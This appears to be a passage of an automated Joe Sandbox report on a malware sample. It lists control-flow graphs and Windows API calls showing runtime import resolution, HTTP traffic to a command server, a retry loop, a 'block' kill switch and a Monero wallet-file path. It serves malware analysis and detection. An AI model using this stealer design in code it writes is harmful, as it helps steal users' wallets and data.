
                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 c99f20-c99f2a 634 c99f30-c9a341 GetProcAddress * 43 633->634 635 c9a346-c9a3da LoadLibraryA * 8 633->635 634->635 636 c9a3dc-c9a451 GetProcAddress * 5 635->636 637 c9a456-c9a45d 635->637 636->637 638 c9a463-c9a521 GetProcAddress * 8 637->638 639 c9a526-c9a52d 637->639 638->639 640 c9a5a8-c9a5af 639->640 641 c9a52f-c9a5a3 GetProcAddress * 5 639->641 642 c9a5b5-c9a642 GetProcAddress * 6 640->642 643 c9a647-c9a64e 640->643 641->640 642->643 644 c9a72f-c9a736 643->644 645 c9a654-c9a72a GetProcAddress * 9 643->645 646 c9a738-c9a7ad GetProcAddress * 5 644->646 647 c9a7b2-c9a7b9 644->647 645->644 646->647 648 c9a7bb-c9a7e7 GetProcAddress * 2 647->648 649 c9a7ec-c9a7f3 647->649 648->649 650 c9a825-c9a82c 649->650 651 c9a7f5-c9a820 GetProcAddress * 2 649->651 652 c9a922-c9a929 650->652 653 c9a832-c9a91d GetProcAddress * 10 650->653 651->650 654 c9a92b-c9a988 GetProcAddress * 4 652->654 655 c9a98d-c9a994 652->655 653->652 654->655 656 c9a9ae-c9a9b5 655->656 657 c9a996-c9a9a9 GetProcAddress 655->657 658 c9aa18-c9aa19 656->658 659 c9a9b7-c9aa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,015163C0), ref: 00C99F3D
                                    • GetProcAddress.KERNEL32(75900000,01516460), ref: 00C99F55
                                    • GetProcAddress.KERNEL32(75900000,01528FA0), ref: 00C99F6E
                                    • GetProcAddress.KERNEL32(75900000,01528EF8), ref: 00C99F86
                                    • GetProcAddress.KERNEL32(75900000,0152C9A0), ref: 00C99F9E
                                    • GetProcAddress.KERNEL32(75900000,0152C8E0), ref: 00C99FB7
                                    • GetProcAddress.KERNEL32(75900000,0151B630), ref: 00C99FCF
                                    • GetProcAddress.KERNEL32(75900000,0152CA00), ref: 00C99FE7
                                    • GetProcAddress.KERNEL32(75900000,0152CA48), ref: 00C9A000
                                    • GetProcAddress.KERNEL32(75900000,0152C940), ref: 00C9A018
                                    • GetProcAddress.KERNEL32(75900000,0152C7F0), ref: 00C9A030
                                    • GetProcAddress.KERNEL32(75900000,01516380), ref: 00C9A049
                                    • GetProcAddress.KERNEL32(75900000,015165C0), ref: 00C9A061
                                    • GetProcAddress.KERNEL32(75900000,01516660), ref: 00C9A079
                                    • GetProcAddress.KERNEL32(75900000,015165E0), ref: 00C9A092
                                    • GetProcAddress.KERNEL32(75900000,0152C850), ref: 00C9A0AA
                                    • GetProcAddress.KERNEL32(75900000,0152CAD8), ref: 00C9A0C2
                                    • GetProcAddress.KERNEL32(75900000,0151B478), ref: 00C9A0DB
                                    • GetProcAddress.KERNEL32(75900000,01516600), ref: 00C9A0F3
                                    • GetProcAddress.KERNEL32(75900000,0152CAA8), ref: 00C9A10B
                                    • GetProcAddress.KERNEL32(75900000,0152C808), ref: 00C9A124
                                    • GetProcAddress.KERNEL32(75900000,0152CA18), ref: 00C9A13C
                                    • GetProcAddress.KERNEL32(75900000,0152C838), ref: 00C9A154
                                    • GetProcAddress.KERNEL32(75900000,015162C0), ref: 00C9A16D
                                    • GetProcAddress.KERNEL32(75900000,0152CA30), ref: 00C9A185
                                    • GetProcAddress.KERNEL32(75900000,0152C820), ref: 00C9A19D
                                    • GetProcAddress.KERNEL32(75900000,0152C9E8), ref: 00C9A1B6
                                    • GetProcAddress.KERNEL32(75900000,0152CA60), ref: 00C9A1CE
                                    • GetProcAddress.KERNEL32(75900000,0152C958), ref: 00C9A1E6
                                    • GetProcAddress.KERNEL32(75900000,0152C868), ref: 00C9A1FF
                                    • GetProcAddress.KERNEL32(75900000,0152C910), ref: 00C9A217
                                    • GetProcAddress.KERNEL32(75900000,0152C880), ref: 00C9A22F
                                    • GetProcAddress.KERNEL32(75900000,0152C928), ref: 00C9A248
                                    • GetProcAddress.KERNEL32(75900000,01529F78), ref: 00C9A260
                                    • GetProcAddress.KERNEL32(75900000,0152CA78), ref: 00C9A278
                                    • GetProcAddress.KERNEL32(75900000,0152CA90), ref: 00C9A291
                                    • GetProcAddress.KERNEL32(75900000,015162E0), ref: 00C9A2A9
                                    • GetProcAddress.KERNEL32(75900000,0152C898), ref: 00C9A2C1
                                    • GetProcAddress.KERNEL32(75900000,01516620), ref: 00C9A2DA
                                    • GetProcAddress.KERNEL32(75900000,0152C8F8), ref: 00C9A2F2
                                    • GetProcAddress.KERNEL32(75900000,0152CAC0), ref: 00C9A30A
                                    • GetProcAddress.KERNEL32(75900000,01516320), ref: 00C9A323
                                    • GetProcAddress.KERNEL32(75900000,01516340), ref: 00C9A33B
                                    • LoadLibraryA.KERNEL32(0152C8B0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A34D
                                    • LoadLibraryA.KERNEL32(0152C8C8,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A35E
                                    • LoadLibraryA.KERNEL32(0152C9D0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A370
                                    • LoadLibraryA.KERNEL32(0152C970,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A382
                                    • LoadLibraryA.KERNEL32(0152C988,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A393
                                    • LoadLibraryA.KERNEL32(0152C9B8,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A3A5
                                    • LoadLibraryA.KERNEL32(0152CCA0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A3B7
                                    • LoadLibraryA.KERNEL32(0152CBB0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A3C8
                                    • GetProcAddress.KERNEL32(75FD0000,01516820), ref: 00C9A3EA
                                    • GetProcAddress.KERNEL32(75FD0000,0152CC40), ref: 00C9A402
                                    • GetProcAddress.KERNEL32(75FD0000,01528B70), ref: 00C9A41A
                                    • GetProcAddress.KERNEL32(75FD0000,0152CCE8), ref: 00C9A433
                                    • GetProcAddress.KERNEL32(75FD0000,015166A0), ref: 00C9A44B
                                    • GetProcAddress.KERNEL32(73530000,0151B298), ref: 00C9A470
                                    • GetProcAddress.KERNEL32(73530000,01516700), ref: 00C9A489
                                    • GetProcAddress.KERNEL32(73530000,0151B068), ref: 00C9A4A1
                                    • GetProcAddress.KERNEL32(73530000,0152CDD8), ref: 00C9A4B9
                                    • GetProcAddress.KERNEL32(73530000,0152CBE0), ref: 00C9A4D2
                                    • GetProcAddress.KERNEL32(73530000,01516840), ref: 00C9A4EA
                                    • GetProcAddress.KERNEL32(73530000,01516720), ref: 00C9A502
                                    • GetProcAddress.KERNEL32(73530000,0152CBC8), ref: 00C9A51B
                                    • GetProcAddress.KERNEL32(763B0000,015167E0), ref: 00C9A53C
                                    • GetProcAddress.KERNEL32(763B0000,01516860), ref: 00C9A554
                                    • GetProcAddress.KERNEL32(763B0000,0152CD90), ref: 00C9A56D
                                    • GetProcAddress.KERNEL32(763B0000,0152CB68), ref: 00C9A585
                                    • GetProcAddress.KERNEL32(763B0000,015169C0), ref: 00C9A59D
                                    • GetProcAddress.KERNEL32(750F0000,0151B1A8), ref: 00C9A5C3
                                    • GetProcAddress.KERNEL32(750F0000,0151AF28), ref: 00C9A5DB
                                    • GetProcAddress.KERNEL32(750F0000,0152CAF0), ref: 00C9A5F3
                                    • GetProcAddress.KERNEL32(750F0000,01516740), ref: 00C9A60C
                                    • GetProcAddress.KERNEL32(750F0000,015168C0), ref: 00C9A624
                                    • GetProcAddress.KERNEL32(750F0000,0151B090), ref: 00C9A63C
                                    • GetProcAddress.KERNEL32(75A50000,0152CB20), ref: 00C9A662
                                    • GetProcAddress.KERNEL32(75A50000,015168E0), ref: 00C9A67A
                                    • GetProcAddress.KERNEL32(75A50000,01528B10), ref: 00C9A692
                                    • GetProcAddress.KERNEL32(75A50000,0152CB38), ref: 00C9A6AB
                                    • GetProcAddress.KERNEL32(75A50000,0152CB50), ref: 00C9A6C3
                                    • GetProcAddress.KERNEL32(75A50000,01516680), ref: 00C9A6DB
                                    • GetProcAddress.KERNEL32(75A50000,01516900), ref: 00C9A6F4
                                    • GetProcAddress.KERNEL32(75A50000,0152CBF8), ref: 00C9A70C
                                    • GetProcAddress.KERNEL32(75A50000,0152CC58), ref: 00C9A724
                                    • GetProcAddress.KERNEL32(75070000,01516880), ref: 00C9A746
                                    • GetProcAddress.KERNEL32(75070000,0152CCB8), ref: 00C9A75E
                                    • GetProcAddress.KERNEL32(75070000,0152CC10), ref: 00C9A776
                                    • GetProcAddress.KERNEL32(75070000,0152CC28), ref: 00C9A78F
                                    • GetProcAddress.KERNEL32(75070000,0152CB80), ref: 00C9A7A7
                                    • GetProcAddress.KERNEL32(74E50000,015169A0), ref: 00C9A7C8
                                    • GetProcAddress.KERNEL32(74E50000,01516980), ref: 00C9A7E1
                                    • GetProcAddress.KERNEL32(75320000,01516920), ref: 00C9A802
                                    • GetProcAddress.KERNEL32(75320000,0152CCD0), ref: 00C9A81A
                                    • GetProcAddress.KERNEL32(6F060000,01516760), ref: 00C9A840
                                    • GetProcAddress.KERNEL32(6F060000,015169E0), ref: 00C9A858
                                    • GetProcAddress.KERNEL32(6F060000,015168A0), ref: 00C9A870
                                    • GetProcAddress.KERNEL32(6F060000,0152CB98), ref: 00C9A889
                                    • GetProcAddress.KERNEL32(6F060000,01516800), ref: 00C9A8A1
                                    • GetProcAddress.KERNEL32(6F060000,015166E0), ref: 00C9A8B9
                                    • GetProcAddress.KERNEL32(6F060000,01516940), ref: 00C9A8D2
                                    • GetProcAddress.KERNEL32(6F060000,015166C0), ref: 00C9A8EA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00C9A901
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00C9A917
                                    • GetProcAddress.KERNEL32(74E00000,0152CD00), ref: 00C9A939
                                    • GetProcAddress.KERNEL32(74E00000,015289F0), ref: 00C9A951
                                    • GetProcAddress.KERNEL32(74E00000,0152CC70), ref: 00C9A969
                                    • GetProcAddress.KERNEL32(74E00000,0152CD18), ref: 00C9A982
                                    • GetProcAddress.KERNEL32(74DF0000,01516960), ref: 00C9A9A3
                                    • GetProcAddress.KERNEL32(6E390000,0152CC88), ref: 00C9A9C4
                                    • GetProcAddress.KERNEL32(6E390000,01516A00), ref: 00C9A9DD
                                    • GetProcAddress.KERNEL32(6E390000,0152CD30), ref: 00C9A9F5
                                    • GetProcAddress.KERNEL32(6E390000,0152CD48), ref: 00C9AA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 7ebd7df9dc11d9b653f651dee3ee16d24edecb7945fb473b2e2746b0b1cad3d8
                                    • Instruction ID: 02d91c3a7b11b3cfff8ae1542dec181b7805ec421b37759be41b1878938e0075
                                    • Opcode Fuzzy Hash: 7ebd7df9dc11d9b653f651dee3ee16d24edecb7945fb473b2e2746b0b1cad3d8
                                    • Instruction Fuzzy Hash: C7623FB5619B08AFC344EFA8FC889567BB9B78D303750861ABB19C3270D7359941EF60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 c848d0-c84992 call c9aab0 call c84800 call c9aa50 * 5 InternetOpenA StrCmpCA 816 c8499b-c8499f 801->816 817 c84994 801->817 818 c84f1b-c84f43 InternetCloseHandle call c9ade0 call c8a210 816->818 819 c849a5-c84b1d call c98cf0 call c9ac30 call c9abb0 call c9ab10 * 2 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9ac30 call c9abb0 call c9ab10 * 2 InternetConnectA 816->819 817->816 829 c84f82-c84ff2 call c98b20 * 2 call c9aab0 call c9ab10 * 8 818->829 830 c84f45-c84f7d call c9ab30 call c9acc0 call c9abb0 call c9ab10 818->830 819->818 905 c84b23-c84b27 819->905 830->829 906 c84b29-c84b33 905->906 907 c84b35 905->907 908 c84b3f-c84b72 HttpOpenRequestA 906->908 907->908 909 c84b78-c84e78 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9aa50 call c9ac30 * 2 call c9abb0 call c9ab10 * 2 call c9ade0 lstrlen call c9ade0 * 2 lstrlen call c9ade0 HttpSendRequestA 908->909 910 c84f0e-c84f15 InternetCloseHandle 908->910 1021 c84e82-c84eac InternetReadFile 909->1021 910->818 1022 c84eae-c84eb5 1021->1022 1023 c84eb7-c84f09 InternetCloseHandle call c9ab10 1021->1023 1022->1023 1025 c84eb9-c84ef7 call c9acc0 call c9abb0 call c9ab10 1022->1025 1023->910 1025->1021
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C84965
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C8498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C84B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00CA0DDE,00000000,?,?,00000000,?,",00000000,?,0152E340), ref: 00C84E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C84E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C84E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C84E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00C84EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00C84F15
                                    • HttpOpenRequestA.WININET(00000000,0152E290,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C84B65
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00C84F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: bcaeae9bd1da744afc76de3c09db1260b8fe688251553a20f8d5602db02fb7d9
                                    • Instruction ID: c70e296f056f2bb72c728fe66da06530d41feb59a6753164e97a9d8ab5ba5e08
                                    • Opcode Fuzzy Hash: bcaeae9bd1da744afc76de3c09db1260b8fe688251553a20f8d5602db02fb7d9
                                    • Instruction Fuzzy Hash: 50120A72910218ABCF14EB90DDAAFEEB379AF15300F504599F10666091EF706F48DFA6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 c95760-c957c7 call c95d20 call c9ab30 * 3 call c9aa50 * 4 1106 c957cc-c957d3 1090->1106 1107 c957d5-c95806 call c9ab30 call c9aab0 call c81590 call c95440 1106->1107 1108 c95827-c9589c call c9aa50 * 2 call c81590 call c95510 call c9abb0 call c9ab10 call c9ade0 StrCmpCA 1106->1108 1124 c9580b-c95822 call c9abb0 call c9ab10 1107->1124 1134 c958e3-c958f9 call c9ade0 StrCmpCA 1108->1134 1138 c9589e-c958de call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1108->1138 1124->1134 1139 c95a2c-c95a94 call c9abb0 call c9ab30 * 2 call c816b0 call c9ab10 * 4 call c81670 call c81550 1134->1139 1140 c958ff-c95906 1134->1140 1138->1134 1270 c95d13-c95d16 1139->1270 1143 c95a2a-c95aaf call c9ade0 StrCmpCA 1140->1143 1144 c9590c-c95913 1140->1144 1162 c95be1-c95c49 call c9abb0 call c9ab30 * 2 call c816b0 call c9ab10 * 4 call c81670 call c81550 1143->1162 1163 c95ab5-c95abc 1143->1163 1147 c9596e-c959e3 call c9aa50 * 2 call c81590 call c95510 call c9abb0 call c9ab10 call c9ade0 StrCmpCA 1144->1147 1148 c95915-c95969 call c9ab30 call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1144->1148 1147->1143 1249 c959e5-c95a25 call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1147->1249 1148->1143 1162->1270 1170 c95bdf-c95c64 call c9ade0 StrCmpCA 1163->1170 1171 c95ac2-c95ac9 1163->1171 1199 c95c78-c95ce1 call c9abb0 call c9ab30 * 2 call c816b0 call c9ab10 * 4 call c81670 call c81550 1170->1199 1200 c95c66-c95c71 Sleep 1170->1200 1178 c95acb-c95b1e call c9ab30 call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1171->1178 1179 c95b23-c95b98 call c9aa50 * 2 call c81590 call c95510 call c9abb0 call c9ab10 call c9ade0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 c95b9a-c95bda call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                                    APIs
                                      • Part of subcall function 00C9AB30: lstrlen.KERNEL32(00C84F55,?,?,00C84F55,00CA0DDF), ref: 00C9AB3B
                                      • Part of subcall function 00C9AB30: lstrcpy.KERNEL32(00CA0DDF,00000000), ref: 00C9AB95
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C958F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95AA7
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C95440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95478
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C95510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95568
                                      • Part of subcall function 00C95510: lstrlen.KERNEL32(00000000), ref: 00C9557F
                                      • Part of subcall function 00C95510: StrStrA.SHLWAPI(00000000,00000000), ref: 00C955B4
                                      • Part of subcall function 00C95510: lstrlen.KERNEL32(00000000), ref: 00C955D3
                                      • Part of subcall function 00C95510: lstrlen.KERNEL32(00000000), ref: 00C955FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C959DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00C95C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 25e7f350451bddf64d933ccc74e2aff588d4560fb57b46eba3ddf6fa4faff0ac
                                    • Instruction ID: ee11c8fb4701775185b2176ca8430bd273d25186a2cd72d71378a670e87cf0da
                                    • Opcode Fuzzy Hash: 25e7f350451bddf64d933ccc74e2aff588d4560fb57b46eba3ddf6fa4faff0ac
                                    • Instruction Fuzzy Hash: F3E112729102089BCF14FBA0ED6AEED737DAF54300F508568B51667491EF346B08EBD6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 c919f0-c91a1d call c9ade0 StrCmpCA 1304 c91a1f-c91a21 ExitProcess 1301->1304 1305 c91a27-c91a41 call c9ade0 1301->1305 1309 c91a44-c91a48 1305->1309 1310 c91a4e-c91a61 1309->1310 1311 c91c12-c91c1d call c9ab10 1309->1311 1313 c91bee-c91c0d 1310->1313 1314 c91a67-c91a6a 1310->1314 1313->1309 1316 c91aad-c91abe StrCmpCA 1314->1316 1317 c91acf-c91ae0 StrCmpCA 1314->1317 1318 c91b41-c91b52 StrCmpCA 1314->1318 1319 c91ba1-c91bb2 StrCmpCA 1314->1319 1320 c91bc0-c91bd1 StrCmpCA 1314->1320 1321 c91b63-c91b74 StrCmpCA 1314->1321 1322 c91b82-c91b93 StrCmpCA 1314->1322 1323 c91a85-c91a94 call c9ab30 1314->1323 1324 c91a99-c91aa8 call c9ab30 1314->1324 1325 c91afd-c91b0e StrCmpCA 1314->1325 1326 c91b1f-c91b30 StrCmpCA 1314->1326 1327 c91bdf-c91be9 call c9ab30 1314->1327 1328 c91a71-c91a80 call c9ab30 1314->1328 1342 c91aca 1316->1342 1343 c91ac0-c91ac3 1316->1343 1344 c91aee-c91af1 1317->1344 1345 c91ae2-c91aec 1317->1345 1350 c91b5e 1318->1350 1351 c91b54-c91b57 1318->1351 1333 c91bbe 1319->1333 1334 c91bb4-c91bb7 1319->1334 1336 c91bdd 1320->1336 1337 c91bd3-c91bd6 1320->1337 1329 c91b80 1321->1329 1330 c91b76-c91b79 1321->1330 1331 c91b9f 1322->1331 1332 c91b95-c91b98 1322->1332 1323->1313 1324->1313 1346 c91b1a 1325->1346 1347 c91b10-c91b13 1325->1347 1348 c91b3c 1326->1348 1349 c91b32-c91b35 1326->1349 1327->1313 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 c91af8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00C91A15
                                    • ExitProcess.KERNEL32 ref: 00C91A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
